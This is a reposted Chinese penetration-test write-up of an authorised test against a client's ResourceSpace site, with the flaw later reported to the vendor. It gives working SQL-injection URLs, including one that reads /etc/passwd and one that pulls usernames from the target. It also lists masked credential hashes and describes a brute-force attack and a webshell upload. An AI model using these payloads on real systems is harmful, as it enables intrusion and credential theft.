一次通过漏洞挖掘成功渗透某网站的过程
yuyutoo 2024-12-19 17:34 6 浏览 0 评论
欢迎搜索公众号:白帽子左一
每天分享更多黑客技能,工具及体系化视频教程(免费领)
起因
我们的一个客户希望我们对其网站进行渗透测试,以发现其脆弱点并协助改进安全性。
在拿到对方渗透测试授权之后,我们开始了对其网站的分析。
寻找突破口
对方主站是一个定制开发的CMS,在进行一系列扫描和分析之后,未发现可利用的地方
于是开始分析其二级域名、发现其中某资源管理分站、目标操作系统linux、仅开放HTTP(80端口)、整站程序为ResourceSpace、一个开源php建站程序。
漏洞挖掘
因为是开源程序,考虑其漏洞挖掘相对容易一些,于是决定把这个网站作为突破口。
于是到resourcespace的官方网站(http://www.resourcespace.org/)下载最新版源代码,在本地本地搭建测试环境,开始白盒审计代码。
这个resourcespace大部分功能都是要登陆后才能使用的,而我们目标网站不允许外部注册用户,所以我们要挖掘不需要登录验证就可利用的漏洞。
第一步要挖的是那些容易利用的漏洞,SQL注入之类的,经过一番grep,在pages/search_disk_usage.php里面发现一处调用:
$results=do_search(getval("search",""),getvalescaped("restypes",""),"relevance",getval("archive",""),-1,"desc",false,$starsearch,false,true);
再来看一下include/search_functions.php
if($sql_filter!="") {$sql_filter.=" and ";}
$sql_filter.="archive='$archive'"; }
returnsql_query($sql_prefix . "select distinct *,r2.hit_count score from (select$select from resource r $sql_join where$sql_filter order by ref desc limit $last ) r2 order by $order_by" .$sql_suffix,false,$fetchrows);
这里存在一个典型的SQL注入漏洞。
我们在本地测试环境中访问以下URL来测试:
http://192.168.1.172/ResourceSpace/pages/search_disk_usage.php?archive=a'
返回:
证明了注入点确实存在。
不过这个超长的嵌套SQL注入要想利用起来还是有点麻烦的,想构造语句闭合几个语句试了半天没发现合适的方法。
因为对方数据库是mysql所以准备利用rand&groupby报错大法来试一下。
构造语句是这样的:
http://192.168.1.172/ResourceSpace/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),substring(load_file('/etc/passwd'),0,5))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
果然读到了passwd文件内容,这是利用mysql一个特有的bug来报错的手段,也是常用的SQL注入方法,对该方法原理不再赘述,感兴趣的请参考:http://bugs.mysql.com/bug.php?id=8652。
接下来要做是获取管理员密码,进后台传webshell,于是尝试了目标网站:
http://rs.XXXX.com/ResourceSpace/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20username%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
返回:
密码破解
返回了加密后的密码,到这里成功的希望就已经相当大了。
因为手工注入太麻烦,所以写了个程序来跑出目标网站所有的账号和密码。
admin-----b****d93ce187f01b7e7c96b0b1df062
Sp****erS-----a****437d2e18f2fe5bf623412427493
J****J-----9****aa12a24a73953d5ab95567cd5d1
n****nph-----6****7f9f3d7ea132ba42d349df99b01
d****e-----1****dd082b77c13ca1ecafd1a0d7ac4
N****iaA-----a****4dfd4c74c15d9e7ab2620639f21
D****ahT-----c****cb83afadf07dda15b8a7716068a
J****P-----d****001e3b5f26967007ab2647b8ae6
b****rtm-----9****6d20cd016ffb3bc9593bd3ed0f3
J****R-----a****4b643d1e69aa8d51f9c616e46c9
L****A-----b****7d728a7048add07b6404e6854ac
……
密码看起来像是MD5加密的,不过进一步查看源代码却发现形势不容乐观,加密是加用户名salt后MD5的:
md5($salt+$username+$pass)
这意味着无法在cmd5等网站查询,也无法使用彩虹表破解,而只能选择暴力破解:
(但resourcespace的默认密码策略是要求密码必须同时使用字母和数字的,这样破解的希望就更小了,于是乎写了个破解程序:
挂上我们的NB字典开始跑密码,本来没抱太大希望,但是希望总是留给勇于尝试的人,还真有一个用户使用了弱口令。
虽然不是admin账号,但是成功登陆进去一样可以做很多事情,我们接下来的目标是:获取webshell进而获得系统权限。
文件上传
使用用户choib/qwer1234登录进目标网站,发现有个地方是可以上传图片的,而且通过字节截断可以上传php文件,但是存在一个很大的问题是,上传后的文件被重命名为随机文件名,我们无法找到上传后的webshell。
渗透过程到这里再一次陷入僵局。
再回过头来看resourcespace程序代码,通过分析程序发现可通过提交不正常请求,使程序强制报错,爆出上传的文件名。
当点击下载图片时,并不会直接连接图片的URL地址,而是通过访问
/ResourceSpace/pages/download_progress.php?ref=24&ext=php&k=&alternative=1&search=%21last1000&offset=0&archive=0&sort=DESC&order_by=relevance
我们可以通过Burp修改HTTP请求,来让程序报错:
这样就找到了上传后的文件,并且在目标系统上获得了webshell:
后记
获得shell后,我们又做了大量的工作,例如提权获得root,内网渗透等等,但是因为涉及客户一些敏感信息,这里就不再具体介绍了。
本文的主旨还是介绍通过挖掘并利用resourcespace漏洞来获得渗透的突破口。
最后,作为一家负责任的安全厂商,我们把此漏洞提交给了resourcespace官方,希望能够对提升开源软件的安全性做一些贡献。
作者:椒图科技
来源:https://www.freebuf.com/articles/web/31053.html
相关推荐
- 建筑福利-pdf转dwg格式转换器,再也不用描图-极客青年
-
作为一名经常熬夜画图的建筑狗或者cad用户,你体验过pdf图纸描图到cad吗?前几天一个老同学找我,说他的毕业设计需要我帮忙,发给我一份pdf图纸文件,问我怎么把pdf图纸转换成dwg格式。机智的我灵...
- 想学 HTML,不知从何入手?看完这篇文章你就知道了
-
很多人都说HTML是一门很简单的语言,看看书,看看视频就能读懂。但是,如果你完全没有接触过,就想通过看一遍教程,背背标签,想要完全了解HTML,真的有点太天真了。HTML中文...
- 「前端」HTML之结构
-
今天继续为大家分享前端的知识,如果对前端比较感兴趣的小伙伴,可以关注我,我会更大家继续分享更多与前端相关的内容,当然如果内容中又不当的或者文字错误的,欢迎大家在评论区留言,我会及时修改纠正。1.初识H...
- 手把手教你使用Python网络爬虫下载一本小说(附源码)
-
大家好,我是Python进阶者。前言前几天【磐奚鸟】大佬在群里分享了一个抓取小说的代码,感觉还是蛮不错的,这里分享给大家学习。...
- 用于处理pdf文件格式的转换器
-
在上传过程中如果单个文件太大则容易中断,而且文件太大的话对与存储也有些弊端。那么我们应该想到将文件进行压缩(注意这里压缩指的是不改变文件格式的压缩,而不是用变成压缩文件。这里就将以下用专门的软件压缩P...
- 乐书:在线 Kindle 电子书制作和转换工具
-
之前Kindle伴侣曾推荐过可以在Windows和Mac系统平台上运行的kindle电子书制作软件Sigil(教程),用它可以制作出高质量的的ePub格式电子书,当然最后还需要通...
- 付费文档怎么下载?教你5种方法,任意下载全网资源
-
网上查资料的时候,经常遇到需要注册登录或者付费的才能复制或者是下载,遇到这种情况大多数人都会选择重新查。...
- 捡来的知识!3种方法随便复制网页内容,白嫖真香呀
-
网上的资源真的多,所以许多人常常会从网上找资料。我们看到感兴趣的内容,第一时间可能会想要收入囊中。比如说截个图啊,或者挑选有意思的句子复制粘贴,记录下来。可是,有些时候,却会遇到这样的情况:1、内容不...
- AI的使用,生成HTML网页。
-
利用deepseek,豆包,kimi以及通义千问,写入相同的需求。【写一个网页,实现抽奖功能,点击“开始”,按键显示“停止”,姓名开始显示在屏幕上,人员包括:“张三”,“里斯”,“Bool”,“流水废...
- pdf转换成jpg转换器 4.1 官方正式版
-
pdf转换成jpg工具软件简介pdf转换成jpg转换器是一款界面简洁,操作方便的pdf转换成jpg转换器。pdf转换成jpg转换器可以将PDF文档转换为JPG,BMP,GIF,PNG,TIF图片文件。...
- 办公必备的office转换成pdf转换器怎么用?
-
2016-02-2415:53:37南方报道网评论(我要点评)字体刚从校园走出社会,对于快节奏的办公环境,难免会觉得有些吃力。在起步阶段力求将手头上的事情按时完工不出错,但是渐渐的你会发现,别人只...
- 为什么PDF转Word大多要收费?
-
PDF转Word大多都要收费?并非主要是因为技术上的难度,而是基于多方面的商业和版权考虑的,下面给大家浅分析下原因:...
- 如何用python生成简单的html report报告
-
前提:用python写了一个简单的log分析,主要也就是查询一些key,value出来,后面也可以根据需求增加。查询出来后,为了好看,搞个html表格来显示。需要的组件:jinja2flask...
- 学用系列|如何搞定word批量替换修改和格式转换?这里一站搞定
-
想必不少朋友都会碰到批量修改word文档内容、压缩文档图片、文件格式转换等重复性文档处理工作的需要,今天胖胖老师就推荐给大家一个免费工具XCLWinKits,一站搞定你所有的需要。什么是XCLWinK...
- 这款PDF文档转换神器,能帮你解决PDF使用中的许多难点
-
不管是平时的学习还是工作,相信许多朋友都经常接触PDF文件。可以说,PDF文件在我们的日常办公学习过程中的重要性和Word文档一样重要。在之前的更新中,小编介绍了几款非常不错的PDF文档格式转换软件,...
你 发表评论:
欢迎- 一周热门
-
-
前端面试:iframe 的优缺点? iframe有那些缺点
-
带斜线的表头制作好了,如何填充内容?这几种方法你更喜欢哪个?
-
漫学笔记之PHP.ini常用的配置信息
-
其实模版网站在开发工作中很重要,推荐几个参考站给大家
-
推荐7个模板代码和其他游戏源码下载的网址
-
[干货] JAVA - JVM - 2 内存两分 [干货]+java+-+jvm+-+2+内存两分吗
-
正在学习使用python搭建自动化测试框架?这个系统包你可能会用到
-
织梦(Dedecms)建站教程 织梦建站详细步骤
-
【开源分享】2024PHP在线客服系统源码(搭建教程+终身使用)
-
2024PHP在线客服系统源码+完全开源 带详细搭建教程
-
- 最近发表
- 标签列表
-
- mybatis plus (70)
- scheduledtask (71)
- css滚动条 (60)
- java学生成绩管理系统 (59)
- 结构体数组 (69)
- databasemetadata (64)
- javastatic (68)
- jsp实用教程 (53)
- fontawesome (57)
- widget开发 (57)
- vb net教程 (62)
- hibernate 教程 (63)
- case语句 (57)
- svn连接 (74)
- directoryindex (69)
- session timeout (58)
- textbox换行 (67)
- extension_dir (64)
- linearlayout (58)
- vba高级教程 (75)
- iframe用法 (58)
- sqlparameter (59)
- trim函数 (59)
- flex布局 (63)
- contextloaderlistener (56)